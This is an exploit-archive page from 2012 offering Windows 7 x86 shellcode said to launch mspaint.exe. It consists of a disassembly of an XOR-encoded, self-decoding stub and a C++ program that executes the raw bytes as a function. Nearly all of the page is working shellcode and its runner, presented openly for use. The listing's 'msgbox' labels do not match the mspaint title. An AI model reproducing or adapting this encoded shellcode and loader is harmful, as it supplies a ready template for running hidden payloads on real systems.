win32/7 Ultimate mspaint.exe ShellCode



EKU-ID: 2269 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2012-06-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
    title : win32/7 Ultimate mspaint.exe ShellCode
    Author: Ayrbyte
    Link : -
    Version: -
    Category: local
    Tested on: Windows 7 Ultimate
    Code : c++

(diasembly code)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP                             
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
00403025   2AA6 F69DFAAD    SUB AH,BYTE PTR DS:[ESI+ADFA9DF6]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012               
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT                                 
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???                              
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH      
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT                                     
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B             
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX                        
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX        
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???                              
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]
*/

#include <windows.h>
char string[] =
"\xbb\x44\x9b\xb4\x0e\x33\xc9\xdb\xc4\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x5d\x13\x83\xc5\x04\x03\x5d\x0f\xe2\xb1\x67\x5c\x87\x39\x98\x9d\xf8\xb0\x7d\xac\x2a\xa6\xf6\x9d\xfa\xad\x5b\x2e\x70\xe3\x4f\xa5\xf4\x2b\x7f\x0e\xb2\x0d\x4e\x8f\x72\x91\x1c\x53\x14\x6d\x5f\x80\xf6\x4c\x90\xd5\xf7\x89\xcd\x16\xa5\x42\x99\x85\x5a\xe7\xdf\x15\x5a\x27\x54\x25\x24\x42\xab\xd2\x9e\x4d\xfc\x4b\x94\x05\xe4\xe0\xf2\xb5\x15\x24\xe1\x89\x5c\x41\xd2\x7a\x5f\x83\x2a\x83\x51\xeb\xe1\xba\x5d\xe6\xf8\xfb\x5a\x19\x8f\xf7\x98\xa4\x88\xcc\xe3\x72\x1c\xd0\x44\xf0\x86\x30\x74\xd5\x51\xb3\x7a\x92\x16\x9b\x9e\x25\xfa\x90\x9b\xae\xfd\x76\x2a\xf4\xd9\x52\x76\xae\x40\xc3\xd2\x01\x7c\x13\xba\xfe\xd8\x58\x29\xea\x5b\x03\x24\xed\xee\x3e\x01\xed\xf0\x40\x22\x86\xc1\xcb\xad\xd1\xdd\x1e\x8a\x2e\x94\x02\xbb\xa6\x71\xd7\xf9\xaa\x81\x02\x3d\xd3\x01\xa6\xbe\x20\x19\xc3\xbb\x6d\x9d\x38\xb6\xfe\x48\x3e\x65\xfe\x58\x53\xfa\x70\x02\xc2\x92\x04\xc4";
int main(){((void (*)(void))string)();}